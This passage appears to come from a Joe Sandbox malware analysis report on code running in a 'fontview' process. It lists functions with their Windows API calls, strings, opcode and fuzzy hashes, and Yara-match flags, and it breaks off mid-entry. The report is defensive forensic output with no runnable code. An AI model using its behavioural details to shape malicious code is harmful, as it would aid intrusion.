                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                              • Opcode ID: 7d41e6efa8a3056bff8667dbe25614e003a0072bfd78014725bb9481142b0a34
                                                                                                                              • Instruction ID: a9cf2e3a25530797996dbacce8df0eb4d8abf41cdcc2803382355aff63301c1b
                                                                                                                              • Opcode Fuzzy Hash: 7d41e6efa8a3056bff8667dbe25614e003a0072bfd78014725bb9481142b0a34
                                                                                                                              • Instruction Fuzzy Hash: 1031FFB0640700ABD314DFA4D8C5BABB7B9EB84700F10866AED1D5B285DB70A584CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A48BF1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 02A48CF6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 3188754299-2766056989
                                                                                                                              • Opcode ID: e1986f5b3fcc0210fd6e309bedee3a4732fa9f17d60f2a211b3c8dc8d453dd26
                                                                                                                              • Instruction ID: e63622021a3984b5da470e808c8ee9bfb588e9151fcfff3e9a12c1e26d12588f
                                                                                                                              • Opcode Fuzzy Hash: e1986f5b3fcc0210fd6e309bedee3a4732fa9f17d60f2a211b3c8dc8d453dd26
                                                                                                                              • Instruction Fuzzy Hash: 59716FB2940218AADB25EB64CDC5FFFB3BDAF54304F044599A919A6140EF74AB848F60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A4E57E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 102COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 02A4E597
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID: @J7<
                                                                                                                              • API String ID: 2538663250-2016760708
                                                                                                                              • Opcode ID: bd7c1e62fe23c8e041133a13d2c0f14902f2e5e434014f8805fd0bc7b656295f
                                                                                                                              • Instruction ID: e84d9d2e0edd8a38e1b53b472587eff5a6bb17fc7394e04d709ae06c6872bc8f
                                                                                                                              • Opcode Fuzzy Hash: bd7c1e62fe23c8e041133a13d2c0f14902f2e5e434014f8805fd0bc7b656295f
                                                                                                                              • Instruction Fuzzy Hash: 843110B5A0020AAFDB00DFD8DC809EFB7B9BF88314F108559E515EB254DB75EE458BA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A4E580 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 02A4E597
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID: @J7<
                                                                                                                              • API String ID: 2538663250-2016760708
                                                                                                                              • Opcode ID: 796d385c14dc85baa4898d03e28137c5cb72002d3eb4a205f250581aa37e0e89
                                                                                                                              • Instruction ID: 22e1d8207c1735b069153fa8aca3dd26bcfcca5dacf02aef7602167e40733805
                                                                                                                              • Opcode Fuzzy Hash: 796d385c14dc85baa4898d03e28137c5cb72002d3eb4a205f250581aa37e0e89
                                                                                                                              • Instruction Fuzzy Hash: 963132B5A0020A9FDB00DFD8DC809EFB7B9BF88304F108559E905EB214DB75EE458BA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A441C0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A44232
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Load
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2234796835-0
                                                                                                                              • Opcode ID: 504a5459d5ecf3373cbdd27d0092ae790cb40cf581195c9a81bb27e7d90e6776
                                                                                                                              • Instruction ID: eb26a132fd9d166ab093283ad334ba867ed528a8fafebb03b2cac15bc5673253
                                                                                                                              • Opcode Fuzzy Hash: 504a5459d5ecf3373cbdd27d0092ae790cb40cf581195c9a81bb27e7d90e6776
                                                                                                                              • Instruction Fuzzy Hash: AE011EB9E4020DBBDF10DBE4DD81FAEB7B99B54308F004195AD18A7240FA31EB58CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A555E0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,02A47633,00000010,?,?,?,00000044,?,00000010,02A47633,?,?,?), ref: 02A55640
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2186235152-0
                                                                                                                              • Opcode ID: 2b99a3d2ba528747ebb5d8efeff1f23e48b528e460fc6ee6051460f241c27a6f
                                                                                                                              • Instruction ID: 7798d4937499c4074d12fc1078eea67f21d739e135f9ffd972c8661350eda5bb
                                                                                                                              • Opcode Fuzzy Hash: 2b99a3d2ba528747ebb5d8efeff1f23e48b528e460fc6ee6051460f241c27a6f
                                                                                                                              • Instruction Fuzzy Hash: 0601C4B2210108BBCB44DE89DC80EEB77ADAF8C750F408208BA0DD3240D630FC518BA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A39950 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A39995
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              • Opcode ID: d6c9136912e055820e86070ad2bd0b1d9dcdf308d2b87ea2705310ec5facd245
                                                                                                                              • Instruction ID: 3a6c9d783a9753c5af15d6af48114a31c857e09970367db87ef9847a9408e3f4
                                                                                                                              • Opcode Fuzzy Hash: d6c9136912e055820e86070ad2bd0b1d9dcdf308d2b87ea2705310ec5facd245
                                                                                                                              • Instruction Fuzzy Hash: 18F0657338421437E33162A99C02FD7B28CCB81B71F250015FA0DEB1C0DDA6B54146A5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A543D8 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02A54423
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$NameName_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3514427675-0
                                                                                                                              • Opcode ID: c2445289eda9555fc45807dccd409e16db2224c0dcfe84a935c880136f7ad117
                                                                                                                              • Instruction ID: 4ef2c17557cf1828dd9aa642265a11465ff3bc3a516d0227c2a84c9994b9450c
                                                                                                                              • Opcode Fuzzy Hash: c2445289eda9555fc45807dccd409e16db2224c0dcfe84a935c880136f7ad117
                                                                                                                              • Instruction Fuzzy Hash: F5F034B6640204BFDB10DF58DC40EEB77ADAF89710F108019B908A7201C630A9218BB0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A3994F Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A39995
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              • Opcode ID: 27db7e4f1c40180deb40fba969c72951f2438392983526302a12986646610f5b
                                                                                                                              • Instruction ID: fa99d2a4eb66ebcf6ab05d10af9cd1b37fafcb7b595e5c540ad371bb3a66de39
                                                                                                                              • Opcode Fuzzy Hash: 27db7e4f1c40180deb40fba969c72951f2438392983526302a12986646610f5b
                                                                                                                              • Instruction Fuzzy Hash: 0FE0927228031037E23162A98C02FD7B28CCB81B60F210019FA0DAB1C0DDA6B94146A9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A543E0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02A54423
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$NameName_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3514427675-0
                                                                                                                              • Opcode ID: ece5c4e44c802038c3c00ab1117330d67c0bc9679ff817112f1a7c9b98d1d4e2
                                                                                                                              • Instruction ID: 5f44e89a4c3a6238c27d260dc03cfda1fe29b4af507cbc046e91002b02e2ef27
                                                                                                                              • Opcode Fuzzy Hash: ece5c4e44c802038c3c00ab1117330d67c0bc9679ff817112f1a7c9b98d1d4e2
                                                                                                                              • Instruction Fuzzy Hash: 05F015B5200208BBDA10EF59DC40EAB77ADEF89710F008009B918A7241DA30B9618BB5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A55500 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(02A42003,?,02A535E3,02A42003,02A535D7,02A535E3,?,02A42003,02A535D7,00001000,?,?,02A56D40), ref: 02A5553F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1279760036-0
                                                                                                                              • Opcode ID: e1c311fbd65a32222058b270af25a25db7b17eb137dc85a2ea9762b5d7bcab8f
                                                                                                                              • Instruction ID: c6d1092d8ede1a4908cbe4fe7c325c79c6b546e6efc60daa7decb13725038dfb
                                                                                                                              • Opcode Fuzzy Hash: e1c311fbd65a32222058b270af25a25db7b17eb137dc85a2ea9762b5d7bcab8f
                                                                                                                              • Instruction Fuzzy Hash: D7E065B22403047FDA10EE99EC45FAB77ADEFC9B10F008409F908A7241DA30BA108BB5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A55550 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BF45503,00000007,00000000,00000004,00000000,02A439AF,000000F0,?,?,?,?,00000000), ref: 02A5558F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3298025750-0
                                                                                                                              • Opcode ID: 973832adfc58f53b01a8be7ba7dbe50df262dfa26736ccdf8cacf5f7a2515294
                                                                                                                              • Instruction ID: 08640acaf44785875cf573a4ffa549674d4d25b11c06ba0bf77f8515fa8c956b
                                                                                                                              • Opcode Fuzzy Hash: 973832adfc58f53b01a8be7ba7dbe50df262dfa26736ccdf8cacf5f7a2515294
                                                                                                                              • Instruction Fuzzy Hash: EBE065B22403057BDA10EE98DC41FEB73ADEFC9B10F004019F908A7241DA30B9108BB9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A47670 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 02A4769C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3188754299-0
                                                                                                                              • Opcode ID: daadd9a1ddf99c42297cf972137ca56b7fa0b44c7aa5197b290b57de65c78fb7
                                                                                                                              • Instruction ID: c0d53d0402b945544a7d923000e2c78bd3fd79c36196c443b4353d352126220a
                                                                                                                              • Opcode Fuzzy Hash: daadd9a1ddf99c42297cf972137ca56b7fa0b44c7aa5197b290b57de65c78fb7
                                                                                                                              • Instruction Fuzzy Hash: 01E0867129030427EF246BBCDC86F66735D8BC9728F294660B91CDB2C1EFB8F5019250
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A54472 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02A54423
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$NameName_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3514427675-0
                                                                                                                              • Opcode ID: d543bc7ea2c4917e9d630e4f6826782573a037eb49ab14810ce78e9d456bfdb1
                                                                                                                              • Instruction ID: 56bd2c21e0ec26719c9bdfc02c59a00accd66269219e4bccf692bc0ef4cbbe6a
                                                                                                                              • Opcode Fuzzy Hash: d543bc7ea2c4917e9d630e4f6826782573a037eb49ab14810ce78e9d456bfdb1
                                                                                                                              • Instruction Fuzzy Hash: F6E0ECB9204206AF9B08EF58E851CAB7B75EFC96107108146FC1887656D630D965CBB1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A47480 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02A41ADA,02A42249,02A535D7,00000000), ref: 02A474B3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              • Opcode ID: b48985f2fe184756bdc58c28baab54ef7dafb5f5469c6f46e1ae8c008718acbc
                                                                                                                              • Instruction ID: d979b24e4baad6803214c8ce0b20d83e66f7f556c5873ffe861ce63463865a16
                                                                                                                              • Opcode Fuzzy Hash: b48985f2fe184756bdc58c28baab54ef7dafb5f5469c6f46e1ae8c008718acbc
                                                                                                                              • Instruction Fuzzy Hash: 35D02EB12C03003BF201ABF19C46F26B28C5B44790F024024B90CE72C0ED74E1004661
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 816464059656139519a81d9d8e73f7ca621b553d11238896cb94d33e200287b6
                                                                                                                              • Instruction ID: 3d16c97899eed06efe7d4dbfc7d642d4d76ddc12df9d7846b4a482e759986a3c
                                                                                                                              • Opcode Fuzzy Hash: 816464059656139519a81d9d8e73f7ca621b553d11238896cb94d33e200287b6
                                                                                                                              • Instruction Fuzzy Hash: 74B04C729015C585EA51A76046087167A046B91706F56C066D2420641A4729D591E1B5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 02A3E36F Relevance: .0, Instructions: 17COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 816e1d47ed275d67d64079513bef308f261f24e1b4a17867bac4290b34ce0f13
                                                                                                                              • Instruction ID: 8fdac4adc68b6227820289ae248b2725e010e441d5c3c36afee045678b46bf41
                                                                                                                              • Opcode Fuzzy Hash: 816e1d47ed275d67d64079513bef308f261f24e1b4a17867bac4290b34ce0f13
                                                                                                                              • Instruction Fuzzy Hash: E9C01232E1141457CA118D0DAC412B5F374DB46224F005252EC4C97501D222F57985C9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: 87d3d8eb3062052e7ce828ed59ff7afedcddf4a88a9a006ced61507f955c675c
                                                                                                                              • Instruction ID: a63f1dd75496701c63b59e4afffdfd7e0ce06ae62a117481c9406e9361c8f37d
                                                                                                                              • Opcode Fuzzy Hash: 87d3d8eb3062052e7ce828ed59ff7afedcddf4a88a9a006ced61507f955c675c
                                                                                                                              • Instruction Fuzzy Hash: BA51CAB6A04116BFDB10DF9989946BEF7BCBB48204714816AE4E9D7642D334FE5087E0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04B22410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: 9b01e79233927e7249c318f8739f75b2fd69dc97bd73ca5ad9547837739329cf
                                                                                                                              • Instruction ID: 7adc42525d4ebdbb058bbf8de3f888c2a1e4e38ed74dc0ffdc9b653fddc73132
                                                                                                                              • Opcode Fuzzy Hash: 9b01e79233927e7249c318f8739f75b2fd69dc97bd73ca5ad9547837739329cf
                                                                                                                              • Instruction Fuzzy Hash: 9F510771A00656AFDF38DE9CCA9087EB7F8EF48204B04C4D9E59AD7641E674FA40C760
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AA7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04AE4655
                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04AE4742
                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04AE4725
                                                                                                                              • Execute=1, xrefs: 04AE4713
                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04AE46FC
                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04AE4787
                                                                                                                              • ExecuteOptions, xrefs: 04AE46A0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                              • API String ID: 0-484625025
                                                                                                                              • Opcode ID: 488b165022e05a135d6c313a22f30bc8f318bf1ba47cb33e298d868029200108
                                                                                                                              • Instruction ID: b252bd9c0c22e0f2954dab2ab841d229095d151815de9eaf0b9aa42d2c2a299d
                                                                                                                              • Opcode Fuzzy Hash: 488b165022e05a135d6c313a22f30bc8f318bf1ba47cb33e298d868029200108
                                                                                                                              • Instruction Fuzzy Hash: BA51D775A00219BBEB21ABA5DD85BFB77B8EB08304F040099E505AB191E771FE558F90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04ABB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-$0$0
                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction ID: 6e430b7ab2a8cd477fca8f0670242458cd217c01c84ef3dc3a09aa0eb6cf918c
                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
